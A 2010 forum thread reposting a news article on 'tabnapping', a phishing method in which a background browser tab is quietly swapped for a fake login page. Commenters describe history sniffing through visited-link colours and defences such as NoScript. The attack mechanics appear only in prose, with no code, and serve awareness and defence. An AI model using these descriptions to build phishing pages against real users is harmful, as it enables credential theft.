Free Republic
Browse · Search
General/Chat
Topics · Post Article

Skip to comments.

Devious ‘Tabnapping’ Attack Hijacks Browser Tabs
webmonkey ^

Posted on 05/25/2010 12:19:17 PM PDT by Gomez

Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious e-mails (or, for the really paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack — by hijacking your unattended browser tabs.

The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change the tab favicon and title before loading a new site, say a fake version of Gmail, in the background.

Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them.

For example, using Raskin’s method an attacker can hijack your page, detect that you frequently login to Citibank’s website and impersonate that site, complete with a message about automatically ending your session and asking you to login again.

Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, “as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is mailable and moldable and the user will most likely simply think they left [the] tab open.”

The only clue that you’re being tricked is that the URL will be wrong.

Raskin has set up a demonstration on his blog post. Visit the page, switch to another tab and then notice that Raskin’s site will reload to look like the Gmail interface (Raskin uses an image for the demo, obviously easy to detect, but a real attack would offer a login page just like Gmail).

In my testing the attack worked in Firefox 3.6, 3.7a, Opera 10 and Safari 4. It did not work in Google Chrome on OS X when the tab was in the background, though it did work when I switched from Chrome to another application. Also, some browsers don’t change the favicon, though it’s possible that they could with a little tinkering to Raskin’s script.

So how do you stop this attack? Well, Raskin points out that Firefox’s coming Account Manager — which delegates tasks like logging in to the browser — is one possible fix, since it always looks at the URL, even if you don’t. Similar tools like 1Password would also work, provided you use them every time you login to a website.

The other fix is on the developer side, just make sure your site doesn’t load any remote scripts. Even if you trust the site your script is loading from, it’s possible that site could be compromised.

In the mean time, up your paranoia level and start paying attention to the URL bar.


TOPICS: Computers/Internet
KEYWORDS: browsers; chrome; computers; computersecurity; firefox; internet; malware; opera; phishing; safari
The original article has a video demo
1 posted on 05/25/2010 12:19:17 PM PDT by Gomez
[ Post Reply | Private Reply | View Replies]

To: Swordmaker; ShadowAce

ping


2 posted on 05/25/2010 12:19:55 PM PDT by Gomez (killer of threads)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Gomez

Yikes. I am very heavy in the security world these days. This is pretty interesting.


3 posted on 05/25/2010 12:25:28 PM PDT by Lazamataz ("We beat the Soviet Union. Then we became them." -- Lazamataz, 2005)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Gomez; Lazamataz

This is definitely not cool. I know Firefox for version 4 is slated to have a way to hide the history, but its not been said how they will address it.

From what I’ve heard, browsers are designed for allowing access to this history. There’s even a website that can show you a number of places you’ve visited just by displaying their page. It is either through the history or through deciphering the cookies.


4 posted on 05/25/2010 12:32:52 PM PDT by ConservativeMind (Hypocrisy: "Animal rightists" who eat meat & pen up pets while accusing hog farmers of cruelty.)
[ Post Reply | Private Reply | To 1 | View Replies]

To: ConservativeMind

As I’ve said many times, “It will be amusing with the hacker scum discover that Firefox and other ‘Not Microsoft’ browsers are as fun to hack since they are as or more open than IE now.” This is a case where by trying to kill IE, they might be making it into the most secure as it has to defend the most.


5 posted on 05/25/2010 12:35:53 PM PDT by Ingtar (If Palin were perfect, she could campaign for godhood. Since she is human, Obama's job will do.)
[ Post Reply | Private Reply | To 4 | View Replies]

To: Gomez

Seeing more browser hijack threats and more indications that Firefox is just as vulnerable as IE.


6 posted on 05/25/2010 12:36:10 PM PDT by a fool in paradise (Throw the bums out in 2010.)
[ Post Reply | Private Reply | To 1 | View Replies]

To: ConservativeMind; John Robinson; Jim Robinson
From what I’ve heard, browsers are designed for allowing access to this history

My understanding is this: a page will display visited links in different colors. The javascript can then query the color of any given text element. Hence, you can create a hidden page (iframe) that can check to see if you've visited specific web addresses.

This is something that should be of great concern to all FReepers - it is very easy for, say, a government website to check if you've been to http://www.freerepublic.com! (If that link is discolored - which it certainly should be for this crew - then javascript can detect you've been visiting it....)

7 posted on 05/25/2010 12:51:20 PM PDT by Yossarian (A pro-life democrat is one who holds out for something in return for his pro-abortion vote.)
[ Post Reply | Private Reply | To 4 | View Replies]

To: Yossarian; John Robinson; Jim Robinson

But isn’t it the browser that is the only thing determining the color? In this case, I believe it is only the browser doing it. There’s no reason for a browser to SEND all of our history to others to simply change a color on only our screen.

I think other history-related issues are at play with this thread and not the hyperlink color thing you mention. Sorry.


8 posted on 05/25/2010 12:54:20 PM PDT by ConservativeMind (Hypocrisy: "Animal rightists" who eat meat & pen up pets while accusing hog farmers of cruelty.)
[ Post Reply | Private Reply | To 7 | View Replies]

To: rdb3; Calvinist_Dark_Lord; GodGunsandGuts; CyberCowboy777; Salo; Bobsat; JosephW; ...

9 posted on 05/25/2010 12:56:44 PM PDT by ShadowAce (Linux -- The Ultimate Windows Service Pack)
[ Post Reply | Private Reply | To 1 | View Replies]

To: ConservativeMind
No, the site can't send your whole history back to the server, but because the site CSS determines the visited link color, then javascript can execute differently if it detects the text element of a particular link (for example, http://www.freerepublic.com) is the "visited" color or not.

That differing javascript code execution is how the data gets sent back to the server - for example, by trying to load a graphic with a coded file name. Apache will both return the graphic image, but also note that the coded filename was accessed, and by a certain IP address - and, if that spying webpage had a login, by what login account.

10 posted on 05/25/2010 1:02:40 PM PDT by Yossarian (A pro-life democrat is one who holds out for something in return for his pro-abortion vote.)
[ Post Reply | Private Reply | To 8 | View Replies]

To: ShadowAce

Wow! That’s pretty wicked!

Thanks for the heads up!


11 posted on 05/25/2010 1:06:07 PM PDT by KoRn (Department of Homeland Security, Certified - "Right Wing Extremist" - I Hate Mexico)
[ Post Reply | Private Reply | To 9 | View Replies]

To: Gomez

Frack! I’m about ready to go back to Netscape 1.0, text-only ;-)


12 posted on 05/25/2010 1:12:11 PM PDT by bigbob
[ Post Reply | Private Reply | To 1 | View Replies]

To: ConservativeMind

Can you post the name of that site?


13 posted on 05/25/2010 1:17:35 PM PDT by dangerdoc
[ Post Reply | Private Reply | To 4 | View Replies]

To: Gomez

Odd error found; “ memory is mailable and moldable “; probably should be ‘malleable,’ but since this doesn’t affect the story and outcome, who cares.


14 posted on 05/25/2010 1:22:10 PM PDT by Old Professer (The critic writes with rapier pen, dips it twice, then writes again.)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Gomez
I use FF with NoScript, and allow scripts only when I want them, on per site basis. Blocking Javascript also breaks most of ads, and Ghostery cleans up the web bugs.

All in all, Firefox today, with a good set of extensions, is the most privacy-protecting browser on the market. Extensions that you must have are: NoScript, Adblock Plus, Ghostery, OptimizeGoogle. Keep your IE or Chrome for script-heavy trusted sites, but do most of your casual browsing in FF. You'd be amazed to see how many spy and ad sites it blocks.

15 posted on 05/25/2010 1:25:54 PM PDT by Greysard
[ Post Reply | Private Reply | To 1 | View Replies]

To: Greysard

I keep history for one day and keep cookies turned off with a few exceptions. See any problem with that?


16 posted on 05/25/2010 1:43:23 PM PDT by 2aberro
[ Post Reply | Private Reply | To 15 | View Replies]

To: dangerdoc

This article references that and other sites:

http://www.theregister.co.uk/2010/05/20/browser_history_attack/


17 posted on 05/25/2010 1:47:11 PM PDT by ConservativeMind (Hypocrisy: "Animal rightists" who eat meat & pen up pets while accusing hog farmers of cruelty.)
[ Post Reply | Private Reply | To 13 | View Replies]

To: 2aberro
I keep history for one day and keep cookies turned off with a few exceptions. See any problem with that?

Your solutions don't block scripts, and those scripts can do whatever they want to in your browser (such as execute the attack that the article describes.) Web bugs are also not affected, and they report your page visit to whoever planted the bug.

I tested the exploit in my FF, and the exploit doesn't work at all. This is because NoScript blocked the Javascript on his site by default, and that's how it should be. Most sites don't need Javascript, and if it's there it's only to spy on you and to show you the ads. Some sites use Javascript for menus, and most shopping carts use Javascript to validate your input. Those should be allowed. Or I use IE for purchases.

18 posted on 05/25/2010 2:02:08 PM PDT by Greysard
[ Post Reply | Private Reply | To 16 | View Replies]

To: Greysard

Thanks,,, java script is now off... lets see if it adversely affects my surfing..


19 posted on 05/25/2010 2:11:39 PM PDT by 2aberro
[ Post Reply | Private Reply | To 18 | View Replies]

To: Greysard

A lot easier to just use konqueror.


20 posted on 05/25/2010 2:15:20 PM PDT by Darth Reardon (Im running for the US Senate for a simple reason, I want to win a Nobel Peace Prize - Rubio)
[ Post Reply | Private Reply | To 15 | View Replies]

To: ConservativeMind

I just get a network error when I try to hit that site.


21 posted on 05/25/2010 2:19:19 PM PDT by dangerdoc
[ Post Reply | Private Reply | To 17 | View Replies]

To: Gomez
In my testing the attack worked in Firefox 3.6, 3.7a, Opera 10 and Safari 4.

What about IE8? Surely that was able to fall to this attack.

22 posted on 05/25/2010 2:24:49 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)
[ Post Reply | Private Reply | To 1 | View Replies]

To: for-q-clinton

Ok, I just tested on IE8. It only 1/2 worked. The IE logo was still showing on teh page—it wasn’t replaced with the Gmail logo.

Oh and I had to run it in compatibility mode. If I did’t run it in compatability mode the video player would still be on the page overtop of the gmail prop.


23 posted on 05/25/2010 2:31:38 PM PDT by for-q-clinton (If at first you don't succeed keep on sucking until you do succeed)
[ Post Reply | Private Reply | To 22 | View Replies]

To: Greysard

self ping


24 posted on 05/25/2010 3:38:47 PM PDT by killermosquito (Buffalo (and eventually France) is what you get when liberalism runs its course.)
[ Post Reply | Private Reply | To 15 | View Replies]

To: Gomez

I’ve never run with tabs for some reason they annoy me greatly?


25 posted on 05/25/2010 4:09:54 PM PDT by chris_bdba
[ Post Reply | Private Reply | To 1 | View Replies]

To: Ingtar

The difference between MSIE and Firefox, however, is that there are extensive open source communities writing for Firefox whereas MSIE is closed and relegated to the hallowed halls of MS programming. Open source communities generally perform much more extensive exploit testing and plug their holes quicker. They may be fun to hack, but oftentimes the hackers are the same people who are patching the holes.

Think of it like the stories of corporations or the FBI/CIA hiring hackers who breached their networks in order to harden them to future attacks.


26 posted on 05/26/2010 5:10:51 AM PDT by rarestia (It's time to water the Tree of Liberty.)
[ Post Reply | Private Reply | To 5 | View Replies]

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.

Free Republic
Browse · Search
General/Chat
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson